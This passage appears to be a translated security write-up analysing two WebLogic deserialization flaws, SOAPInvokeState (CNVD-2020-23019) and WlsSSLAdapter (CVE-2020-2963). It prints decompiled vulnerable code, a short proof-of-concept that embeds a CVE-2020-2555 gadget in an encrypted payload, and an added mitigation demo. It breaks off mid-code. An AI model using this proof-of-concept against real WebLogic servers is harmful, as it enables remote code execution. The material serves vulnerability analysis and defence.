2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through the analysis and reproduction of two WebLogic deserialization vulnerabilities.
Brief introduction
Both vulnerabilities appear to have been fixed in the May patch set and were found incidentally while analyzing it. The bugs themselves are easy to spot, but the conditions for exploiting them are fairly restrictive.
SOAPInvokeState CNVD-2020-23019
Diffing the patch gives the following (screenshot in the original article, not reproduced here).
The patch clearly replaces ObjectInputStream with FilterInputStream. In WebLogic, FilterInputStream checks every class being deserialized against the blacklist of known gadgets, whereas a plain ObjectInputStream performs no such check. For objects arriving over the T3 protocol, the stream handed to a class's readObject/readExternal is by default a FilterInputStream, which is how WebLogic defends against deserialization attacks.
So there is no deserialization vulnerability unless a class's readObject (or readExternal) creates its own raw ObjectInputStream and reads attacker-controlled bytes through it.
In SOAPInvokeState's readExternal, the only requirement is to reach the following branch:
if ((flags & 1) != 0) {
    try {
        len = in.readInt();
        byte[] bytes = new byte[len];
        in.readFully(bytes);
        bytes = EncryptionUtil.decrypt(bytes);
        ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
        // A raw ObjectInputStream: the gadget blacklist is not applied here
        ObjectInputStream in2 = new ObjectInputStream(bais);
        this.subject = (AuthenticatedSubject) in2.readObject();
    } catch (Exception var13) {
        (new NonCatalogLogger("WebServices")).warning("Couldn't completely read SOAPInvokeState object", var13);
    }
}
Now look at the writeExternal method: if the instance has a non-null subject, it writes out the encrypted serialized subject, which is exactly what makes readExternal take the branch above.
if (this.subject != null) {
    ByteArrayOutputStream var12 = new ByteArrayOutputStream();
    ObjectOutputStream var13 = new ObjectOutputStream(var12);
    var13.writeObject(this.subject);
    var13.flush();
    byte[] var5 = var12.toByteArray();
    var5 = EncryptionUtil.encrypt(var5);
    var1.writeInt(var5.length);
    var1.write(var5);
}
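The defensive point in the two methods above is that a filter installed on the outer stream is never consulted for a second ObjectInputStream opened inside readExternal. The following Java program is an added illustration of that behaviour and of the mitigation; it is not WebLogic code and not from the original article. It assumes Java 9 or later (java.io.ObjectInputFilter, JEP 290), and the class names NestedStreamFilterDemo, Inner and Wrapper are invented for the demo. Inner stands in for a gadget class but is harmless: it only records that its readObject ran.

```java
import java.io.*;

// Added illustration, not WebLogic code: an Externalizable that opens its own
// ObjectInputStream inside readExternal (the SOAPInvokeState pattern) escapes a
// filter that was installed only on the outer stream. A process-wide serial
// filter (JEP 290, Java 9+) is inherited by the nested stream as well.
public class NestedStreamFilterDemo {

    // Stand-in for a gadget class (hypothetical). Harmless: it only records that it ran.
    public static class Inner implements Serializable {
        private static final long serialVersionUID = 1L;
        static volatile boolean deserialized = false;

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            deserialized = true;
        }
    }

    // Mirrors SOAPInvokeState: the inner object travels as an opaque byte[] and is
    // re-deserialized with a fresh ObjectInputStream of the class's own making.
    public static class Wrapper implements Externalizable {
        private byte[] payload;

        public Wrapper() { }  // required by Externalizable

        public Wrapper(Object inner) throws IOException {
            payload = serialize(inner);
        }

        @Override
        public void writeExternal(ObjectOutput out) throws IOException {
            out.writeInt(payload.length);
            out.write(payload);
        }

        @Override
        public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {
            byte[] bytes = new byte[in.readInt()];
            in.readFully(bytes);
            // The outer stream's per-stream filter is not consulted for this nested stream.
            try (ObjectInputStream in2 = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
                in2.readObject();
            }
        }
    }

    // Reject Inner; leave everything else UNDECIDED so the built-in checks still apply.
    static final ObjectInputFilter REJECT_INNER = info ->
        info.serialClass() == Inner.class ? ObjectInputFilter.Status.REJECTED
                                          : ObjectInputFilter.Status.UNDECIDED;

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(o);
        }
        return baos.toByteArray();
    }

    // Deserialize with REJECT_INNER installed on the outer stream only.
    // Returns whether Inner.readObject ran despite that filter.
    static boolean innerRan(byte[] data) throws IOException, ClassNotFoundException {
        Inner.deserialized = false;
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(REJECT_INNER);
            ois.readObject();
        }
        return Inner.deserialized;
    }

    public static void main(String[] args) throws Exception {
        byte[] data = serialize(new Wrapper(new Inner()));

        // 1. Per-stream filter only: the nested stream bypasses it and Inner runs.
        System.out.println("per-stream filter only, Inner ran: " + innerRan(data));

        // 2. Process-wide filter: every new ObjectInputStream, nested ones included,
        //    starts with it, so the nested read is rejected before Inner is built.
        ObjectInputFilter.Config.setSerialFilter(REJECT_INNER);
        try {
            innerRan(data);
            System.out.println("global filter, Inner ran: " + Inner.deserialized);
        } catch (InvalidClassException e) {
            System.out.println("global filter rejected the nested stream: " + e.getMessage());
        }
    }
}
```

The first run prints that Inner ran even though the outer stream rejects it; the second ends in an InvalidClassException raised from inside readExternal. This is the same reason WebLogic's FilterInputStream on the T3 entry point does not help once a class opens its own ObjectInputStream: the filter must be enforced process-wide (or the nested stream must itself be a filtering stream, which is what the patch does) rather than only at the outermost stream.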
There are, however, the following obstacles.
Encryption
EncryptionUtil.encrypt only encrypts when Kernel.isServer() returns true; otherwise it returns the input bytes unchanged. So before encrypting, KernelStatus.setIsServer(true) has to be called to set that state, or the encryption has to be forced some other way.
public static byte[] encrypt(byte[] var0) {
    return getEncryptionService().encryptBytes(var0);
}
In weblogic.security.internal.SerializedSystemIni#getExistingEncryptionService, the key material is read from SerializedSystemIni.dat. In other words, exploiting this vulnerability against a WebLogic server requires either authentication or some way to read that file from the target, which is what makes it hard to use in practice.
public static EncryptionService getExistingEncryptionService() {
    String var0 = DomainDir.getRootDir();
    String var1 = var0 + File.separator + "security" + File.separator + "SerializedSystemIni.dat";
    File var2 = new File(var1);
    if (!var2.exists()) {
        String var3 = var0 + File.separator + "SerializedSystemIni.dat";
        File var4 = new File(var3);
        if (!var4.exists()) {
            return null;
        }
        var1 = var3;
    }
    SerializedSystemIni var5 = new SerializedSystemIni(var1);
    return getEncryptionService(var5.getTheSalt(), var5.getTheEncryptedSecretKey(), var5.getTheAESEncryptedSecretKey());
}
POC
Change writeExternal to the following code, then have the resulting object deserialized.
    BadAttributeValueExpException exp = null;
    try {
        exp = cve_2020_2555.getBadAttributeValueExpException();
    } catch (Exception e) {
        e.printStackTrace();
    }
    out2.writeObject(exp);
    out2.flush();
    byte[] bytes = baos.toByteArray();
    bytes = EncryptionUtil.encrypt(bytes);
    out.writeInt(bytes.length);
    out.write(bytes);
    }
}
WlsSSLAdapter CVE-2020-2963
The principle is the same; see the following code:
private Object readEncryptedField(ObjectInputStream in) throws IOException, ClassNotFoundException {
    int length = in.readInt();
    if (length